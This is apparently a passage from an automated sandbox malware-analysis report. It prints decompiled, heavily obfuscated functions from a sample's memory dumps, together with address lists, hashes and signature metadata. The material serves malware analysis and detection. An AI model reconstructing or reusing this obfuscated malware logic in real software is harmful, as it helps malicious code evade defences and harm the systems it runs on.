				 *(_t426 + 0x30) = 0xb4bbc8;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
				 *(_t426 + 0x28) = 0xdf5b34;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
				_t418 = 0x5e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
				 *(_t426 + 0x90) = 0xff684d;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
				 *(_t426 + 0x20) = 0x90e304;
				_t419 = 0x7f;
				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
				 *(_t426 + 0x60) = 0xa4eb1a;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
				 *(_t426 + 0x34) = 0xdaab0d;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
				 *(_t426 + 0x68) = 0xbbaf5f;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
				_t372 =  *(_t426 + 0x6c);
				_t411 =  *(_t426 + 0x6c);
				_t424 =  *(_t426 + 0x6c);
				_t420 =  *(_t426 + 0x6c);
				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
				 *(_t426 + 0x74) = 0xfd4b1c;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
				 *(_t426 + 0x88) = 0xbb9d8e;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
				 *(_t426 + 0x3c) = 0x9303e6;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E0034C264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E0033B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x353e0c; // 0x0
								E0034458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E00338F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E0034DA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E0033B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E00337FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E00341E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
					E00348519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}






















                                                                                                                    0x003381bd
                                                                                                                    0x003381c7
                                                                                                                    0x003381cf
                                                                                                                    0x003381d4
                                                                                                                    0x003381dc
                                                                                                                    0x003381e4
                                                                                                                    0x003381f3
                                                                                                                    0x003381f8
                                                                                                                    0x003381fe
                                                                                                                    0x00338206
                                                                                                                    0x0033820e
                                                                                                                    0x00338219
                                                                                                                    0x00338224
                                                                                                                    0x0033822f
                                                                                                                    0x00338237
                                                                                                                    0x0033823c
                                                                                                                    0x00338241
                                                                                                                    0x00338246
                                                                                                                    0x0033824e
                                                                                                                    0x0033825b
                                                                                                                    0x0033825c
                                                                                                                    0x00338264
                                                                                                                    0x00338268
                                                                                                                    0x00338270
                                                                                                                    0x00338278
                                                                                                                    0x00338280
                                                                                                                    0x0033828e
                                                                                                                    0x00338292
                                                                                                                    0x0033829a
                                                                                                                    0x003382a2
                                                                                                                    0x003382aa
                                                                                                                    0x003382af
                                                                                                                    0x003382b7
                                                                                                                    0x003382c2
                                                                                                                    0x003382ca
                                                                                                                    0x003382d5
                                                                                                                    0x003382dd
                                                                                                                    0x003382e2
                                                                                                                    0x003382ea
                                                                                                                    0x003382f2
                                                                                                                    0x003382fa
                                                                                                                    0x00338307
                                                                                                                    0x0033830b
                                                                                                                    0x00338313
                                                                                                                    0x0033831b
                                                                                                                    0x00338323
                                                                                                                    0x0033832b
                                                                                                                    0x00338333
                                                                                                                    0x00338338
                                                                                                                    0x00338340
                                                                                                                    0x00338348
                                                                                                                    0x00338355
                                                                                                                    0x00338359
                                                                                                                    0x00338361
                                                                                                                    0x00338369
                                                                                                                    0x00338371
                                                                                                                    0x00338376
                                                                                                                    0x0033837e
                                                                                                                    0x00338386
                                                                                                                    0x0033838b
                                                                                                                    0x00338393
                                                                                                                    0x0033839b
                                                                                                                    0x003383a8
                                                                                                                    0x003383ac
                                                                                                                    0x003383b4
                                                                                                                    0x003383bc
                                                                                                                    0x003383c6
                                                                                                                    0x003383ce
                                                                                                                    0x003383d6
                                                                                                                    0x003383de
                                                                                                                    0x003383e6
                                                                                                                    0x003383eb
                                                                                                                    0x003383f3
                                                                                                                    0x003383fb
                                                                                                                    0x00338403
                                                                                                                    0x00338412
                                                                                                                    0x00338415
                                                                                                                    0x00338419
                                                                                                                    0x00338421
                                                                                                                    0x0033842c
                                                                                                                    0x00338437
                                                                                                                    0x00338442
                                                                                                                    0x0033844a
                                                                                                                    0x0033844f
                                                                                                                    0x00338457
                                                                                                                    0x0033845f
                                                                                                                    0x00338467
                                                                                                                    0x0033846f
                                                                                                                    0x0033847f
                                                                                                                    0x00338483
                                                                                                                    0x0033848b
                                                                                                                    0x00338493
                                                                                                                    0x0033849b
                                                                                                                    0x003384a0
                                                                                                                    0x003384a8
                                                                                                                    0x003384bb
                                                                                                                    0x003384be
                                                                                                                    0x003384c5
                                                                                                                    0x003384d0
                                                                                                                    0x003384e0
                                                                                                                    0x003384e4
                                                                                                                    0x003384ec
                                                                                                                    0x003384f4
                                                                                                                    0x003384fc
                                                                                                                    0x00338504
                                                                                                                    0x00338510
                                                                                                                    0x00338515
                                                                                                                    0x0033851b
                                                                                                                    0x00338520
                                                                                                                    0x00338528
                                                                                                                    0x00338533
                                                                                                                    0x0033853e
                                                                                                                    0x00338549
                                                                                                                    0x00338555
                                                                                                                    0x00338558
                                                                                                                    0x0033855c
                                                                                                                    0x00338561
                                                                                                                    0x00338566
                                                                                                                    0x0033856e
                                                                                                                    0x00338576
                                                                                                                    0x00338580
                                                                                                                    0x00338584
                                                                                                                    0x0033858c
                                                                                                                    0x00338594
                                                                                                                    0x00338599
                                                                                                                    0x003385a1
                                                                                                                    0x003385a6
                                                                                                                    0x003385ae
                                                                                                                    0x003385b6
                                                                                                                    0x003385c0
                                                                                                                    0x003385c4
                                                                                                                    0x003385c8
                                                                                                                    0x003385cc
                                                                                                                    0x003385d0
                                                                                                                    0x003385d4
                                                                                                                    0x003385dc
                                                                                                                    0x003385e4
                                                                                                                    0x003385ec
                                                                                                                    0x003385f4
                                                                                                                    0x00338607
                                                                                                                    0x0033860e
                                                                                                                    0x00338619
                                                                                                                    0x00338621
                                                                                                                    0x00338626
                                                                                                                    0x00338633
                                                                                                                    0x00338637
                                                                                                                    0x0033863f
                                                                                                                    0x0033864a
                                                                                                                    0x00338655
                                                                                                                    0x00338660
                                                                                                                    0x0033866d
                                                                                                                    0x00338671
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00000000
                                                                                                                    0x0033867e
                                                                                                                    0x0033868c
                                                                                                                    0x00338806
                                                                                                                    0x0033880b
                                                                                                                    0x0033880e
                                                                                                                    0x00338810
                                                                                                                    0x00338854
                                                                                                                    0x00338812
                                                                                                                    0x00338812
                                                                                                                    0x00338814
                                                                                                                    0x00338814
                                                                                                                    0x00338818
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033881a
                                                                                                                    0x00338832
                                                                                                                    0x00338837
                                                                                                                    0x0033883a
                                                                                                                    0x0033883c
                                                                                                                    0x0033884a
                                                                                                                    0x0033884b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00338864
                                                                                                                    0x00338864
                                                                                                                    0x00000000
                                                                                                                    0x0033883e
                                                                                                                    0x0033883e
                                                                                                                    0x00338840
                                                                                                                    0x00338842
                                                                                                                    0x0033885d
                                                                                                                    0x00338844
                                                                                                                    0x00338844
                                                                                                                    0x00338814
                                                                                                                    0x00338818
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00338818
                                                                                                                    0x00000000
                                                                                                                    0x00338842
                                                                                                                    0x00338814
                                                                                                                    0x00338868
                                                                                                                    0x00338868
                                                                                                                    0x0033886a
                                                                                                                    0x0033888d
                                                                                                                    0x00338892
                                                                                                                    0x00000000
                                                                                                                    0x0033886c
                                                                                                                    0x00338870
                                                                                                                    0x0033887d
                                                                                                                    0x00338883
                                                                                                                    0x00000000
                                                                                                                    0x00338883
                                                                                                                    0x00000000
                                                                                                                    0x00338692
                                                                                                                    0x00338698
                                                                                                                    0x003387b9
                                                                                                                    0x003387be
                                                                                                                    0x003387c0
                                                                                                                    0x003387c3
                                                                                                                    0x003387c6
                                                                                                                    0x003387cc
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00000000
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x0033869e
                                                                                                                    0x003386a4
                                                                                                                    0x0033874a
                                                                                                                    0x00338765
                                                                                                                    0x0033876a
                                                                                                                    0x0033876c
                                                                                                                    0x00338771
                                                                                                                    0x00338776
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00000000
                                                                                                                    0x00338679
                                                                                                                    0x003386aa
                                                                                                                    0x003386b0
                                                                                                                    0x003386ff
                                                                                                                    0x0033870e
                                                                                                                    0x0033870f
                                                                                                                    0x00338710
                                                                                                                    0x0033871a
                                                                                                                    0x0033871c
                                                                                                                    0x00338722
                                                                                                                    0x00338729
                                                                                                                    0x00000000
                                                                                                                    0x003386b2
                                                                                                                    0x003386b8
                                                                                                                    0x003386f4
                                                                                                                    0x00000000
                                                                                                                    0x003386ba
                                                                                                                    0x003386c0
                                                                                                                    0x003388b2
                                                                                                                    0x003388b2
                                                                                                                    0x003388b8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003388be
                                                                                                                    0x003386c6
                                                                                                                    0x003386dd
                                                                                                                    0x003386e2
                                                                                                                    0x003386c0
                                                                                                                    0x003386b8
                                                                                                                    0x003386b0
                                                                                                                    0x003386a4
                                                                                                                    0x00338698
                                                                                                                    0x003386f1
                                                                                                                    0x00000000
                                                                                                                    0x003386f1
                                                                                                                    0x003388a2
                                                                                                                    0x003388a8
                                                                                                                    0x003388ad
                                                                                                                    0x00000000
                                                                                                                    0x003388ad

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                    • API String ID: 0-1837206032
                                                                                                                    • Opcode ID: a97af903b3b5f26ab8fc4ba086fa37fc7b7a3e50b49edb494cc1a9cb632abf43
                                                                                                                    • Instruction ID: 682e604ca13c265c5465ed233bd06b0b719f46aaee856834a749a2784d1bde56
                                                                                                                    • Opcode Fuzzy Hash: a97af903b3b5f26ab8fc4ba086fa37fc7b7a3e50b49edb494cc1a9cb632abf43
                                                                                                                    • Instruction Fuzzy Hash: 810222711083809FD369CF25C48AA5FBBE1FBC4758F508A1DF69A8A260D7B49949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033E5CF Relevance: 9.0, Strings: 7, Instructions: 204COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0033E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E00332A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E00333DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E00332A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E00332A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E0034D97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
											__eflags = _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E00332A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}


































                                                                                                                    0x0033e5d6
                                                                                                                    0x0033e5dd
                                                                                                                    0x0033e5e4
                                                                                                                    0x0033e5e6
                                                                                                                    0x0033e5e7
                                                                                                                    0x0033e5e8
                                                                                                                    0x0033e5e9
                                                                                                                    0x0033e5ee
                                                                                                                    0x0033e5f6
                                                                                                                    0x0033e5f9
                                                                                                                    0x0033e603
                                                                                                                    0x0033e60b
                                                                                                                    0x0033e60d
                                                                                                                    0x0033e615
                                                                                                                    0x0033e61a
                                                                                                                    0x0033e61f
                                                                                                                    0x0033e627
                                                                                                                    0x0033e62f
                                                                                                                    0x0033e637
                                                                                                                    0x0033e63f
                                                                                                                    0x0033e644
                                                                                                                    0x0033e64c
                                                                                                                    0x0033e654
                                                                                                                    0x0033e65c
                                                                                                                    0x0033e664
                                                                                                                    0x0033e672
                                                                                                                    0x0033e677
                                                                                                                    0x0033e682
                                                                                                                    0x0033e683
                                                                                                                    0x0033e687
                                                                                                                    0x0033e68f
                                                                                                                    0x0033e697
                                                                                                                    0x0033e69f
                                                                                                                    0x0033e6a7
                                                                                                                    0x0033e6ac
                                                                                                                    0x0033e6b4
                                                                                                                    0x0033e6bc
                                                                                                                    0x0033e6c1
                                                                                                                    0x0033e6c9
                                                                                                                    0x0033e6ce
                                                                                                                    0x0033e6d6
                                                                                                                    0x0033e6de
                                                                                                                    0x0033e6e6
                                                                                                                    0x0033e6ee
                                                                                                                    0x0033e6f6
                                                                                                                    0x0033e6fe
                                                                                                                    0x0033e70c
                                                                                                                    0x0033e710
                                                                                                                    0x0033e715
                                                                                                                    0x0033e71d
                                                                                                                    0x0033e725
                                                                                                                    0x0033e72d
                                                                                                                    0x0033e735
                                                                                                                    0x0033e73d
                                                                                                                    0x0033e745
                                                                                                                    0x0033e74a
                                                                                                                    0x0033e752
                                                                                                                    0x0033e75a
                                                                                                                    0x0033e762
                                                                                                                    0x0033e76a
                                                                                                                    0x0033e772
                                                                                                                    0x0033e77a
                                                                                                                    0x0033e782
                                                                                                                    0x0033e78a
                                                                                                                    0x0033e792
                                                                                                                    0x0033e797
                                                                                                                    0x0033e79f
                                                                                                                    0x0033e7a7
                                                                                                                    0x0033e7af
                                                                                                                    0x0033e7b9
                                                                                                                    0x0033e7c1
                                                                                                                    0x0033e7c9
                                                                                                                    0x0033e7ce
                                                                                                                    0x0033e7d6
                                                                                                                    0x0033e7de
                                                                                                                    0x0033e7e3
                                                                                                                    0x0033e7e8
                                                                                                                    0x0033e7f0
                                                                                                                    0x0033e7f8
                                                                                                                    0x0033e803
                                                                                                                    0x0033e80b
                                                                                                                    0x0033e80f
                                                                                                                    0x0033e817
                                                                                                                    0x0033e81f
                                                                                                                    0x0033e827
                                                                                                                    0x0033e82f
                                                                                                                    0x0033e82f
                                                                                                                    0x0033e83d
                                                                                                                    0x0033e90f
                                                                                                                    0x0033e914
                                                                                                                    0x0033e917
                                                                                                                    0x0033e919
                                                                                                                    0x0033e91b
                                                                                                                    0x00000000
                                                                                                                    0x0033e91b
                                                                                                                    0x0033e843
                                                                                                                    0x0033e849
                                                                                                                    0x0033e8e8
                                                                                                                    0x0033e8ed
                                                                                                                    0x0033e8f0
                                                                                                                    0x00000000
                                                                                                                    0x0033e84f
                                                                                                                    0x0033e855
                                                                                                                    0x0033e8bf
                                                                                                                    0x0033e8c4
                                                                                                                    0x0033e8c7
                                                                                                                    0x0033e8c9
                                                                                                                    0x0033e8cf
                                                                                                                    0x00000000
                                                                                                                    0x0033e8cf
                                                                                                                    0x0033e857
                                                                                                                    0x0033e85d
                                                                                                                    0x0033e893
                                                                                                                    0x0033e898
                                                                                                                    0x0033e89b
                                                                                                                    0x0033e89d
                                                                                                                    0x0033e8a3
                                                                                                                    0x00000000
                                                                                                                    0x0033e8a3
                                                                                                                    0x0033e85f
                                                                                                                    0x0033e865
                                                                                                                    0x0033e982
                                                                                                                    0x0033e984
                                                                                                                    0x0033e984
                                                                                                                    0x0033e86b
                                                                                                                    0x0033e871
                                                                                                                    0x00000000
                                                                                                                    0x0033e877
                                                                                                                    0x0033e877
                                                                                                                    0x00000000
                                                                                                                    0x0033e877
                                                                                                                    0x0033e871
                                                                                                                    0x0033e865
                                                                                                                    0x0033e85d
                                                                                                                    0x0033e855
                                                                                                                    0x0033e849
                                                                                                                    0x0033e988
                                                                                                                    0x0033e990
                                                                                                                    0x0033e990
                                                                                                                    0x0033e93a
                                                                                                                    0x0033e93f
                                                                                                                    0x0033e942
                                                                                                                    0x0033e944
                                                                                                                    0x0033e950
                                                                                                                    0x00000000
                                                                                                                    0x0033e946
                                                                                                                    0x0033e946
                                                                                                                    0x00000000
                                                                                                                    0x0033e946
                                                                                                                    0x00000000
                                                                                                                    0x0033e955
                                                                                                                    0x0033e955
                                                                                                                    0x0033e955
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                    • API String ID: 0-2045295228
                                                                                                                    • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                    • Instruction ID: b89f70d364ea173917348e4f8902f59fff3c32b2d4d364ff78fe37c8807005f7
                                                                                                                    • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                    • Instruction Fuzzy Hash: 229175B25083419BC799CE61C88951BFBF5FBD4758F004A1DF58296260D7B1DA19CF83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033E2CC Relevance: 8.9, Strings: 7, Instructions: 178COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E0033E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E00338E4D);
				_push(__edx);
				E003420B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
